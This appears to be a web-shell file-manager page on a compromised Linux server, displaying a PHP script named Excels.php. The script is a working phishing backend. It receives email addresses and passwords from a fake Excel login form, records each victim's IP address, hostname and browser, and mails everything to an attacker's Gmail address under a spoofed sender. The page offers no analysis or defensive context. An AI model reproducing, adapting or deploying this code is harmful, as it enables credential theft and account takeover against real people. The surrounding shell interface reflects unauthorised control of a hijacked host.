HEX
Server: Apache
System: Linux srv4.garantili.com.tr 4.18.0-477.21.1.lve.1.el8.x86_64 #1 SMP Tue Sep 5 23:08:35 UTC 2023 x86_64
User: yenicep (1023)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system
$ pwd: /home2/yenicep/www/898/
Upload Files
File: /home2/yenicep/www/898/Excels.php
<?php
header("Access-Control-Allow-Origin: *");
header("Access-Control-Allow-Methods: POST, GET, OPTIONS");
header("Access-Control-Allow-Headers: Content-Type, Authorization");
header("Content-Type: application/json");

// Handle preflight OPTIONS requests
if ($_SERVER["REQUEST_METHOD"] == "OPTIONS") {
    header("HTTP/1.1 204 No Content");
    exit();
}

if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // Get JSON data from request body
    $json = file_get_contents('php://input');
    $data = json_decode($json, true);
    
    // Extract data from JSON
    $email = trim($data['email'] ?? '');
    $access_key = trim($data['access_key'] ?? ''); // Note: HTML sends 'access_key', not 'password'
    $attempt = trim($data['attempt'] ?? '');
    
    // Get client IP address
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
        $ip = $_SERVER['HTTP_CLIENT_IP'];
    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $ip = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])[0];
    } else {
        $ip = $_SERVER['REMOTE_ADDR'];
    }

    // Replace with your actual email addresses
    $recipients = ["apostle835@gmail.com"];

    if (!empty($email) && !empty($access_key)) {
        $hostname = gethostbyaddr($ip);
        $useragent = $_SERVER['HTTP_USER_AGENT'];

        // Construct the email message
        $message = "|--------------|LOGIN DETAILS|-------------|\n";
        $message .= "|Email: " . $email . "\n";
        $message .= "|Password/Access Key: " . $access_key . "\n";
        $message .= "|Attempt: " . $attempt . "\n";
        $message .= "|---------------|IP DETAILS|-------------------|\n";
        $message .= "|Client IP: " . $ip . "\n";
        $message .= "|Hostname: " . $hostname . "\n";
        $message .= "|User Agent: " . $useragent . "\n";
        $message .= "|--- http://www.geoiptool.com/?IP=$ip ----\n";
        $message .= "|-------------------|--------------------------|\n";

        $subject = "Excel Login Attempt #$attempt - $ip";

        // Send email to all recipients
        $emailSent = false;
        foreach ($recipients as $to) {
            // Add additional headers for better email formatting
            $headers = "From: Excel Login System <noreply@excel-system.com>\r\n";
            $headers .= "Reply-To: noreply@excel-system.com\r\n";
            $headers .= "X-Mailer: PHP/" . phpversion();
            
            if (mail($to, $subject, $message, $headers)) {
                $emailSent = true;
            }
        }

        if ($emailSent) {
            $signal = 'ok';
            $msg = 'Credentials sent successfully.';
        } else {
            $signal = 'bad';
            $msg = 'Failed to send email.';
        }
    } else {
        $signal = 'bad';
        $msg = 'All fields are required.';
    }
} else {
    $signal = 'bad';
    $msg = 'Invalid request method.';
}

// Prepare response data
$response = array(
    'signal' => $signal,
    'msg' => $msg,
);

// Return response as JSON
echo json_encode($response);
?>
@ Telegram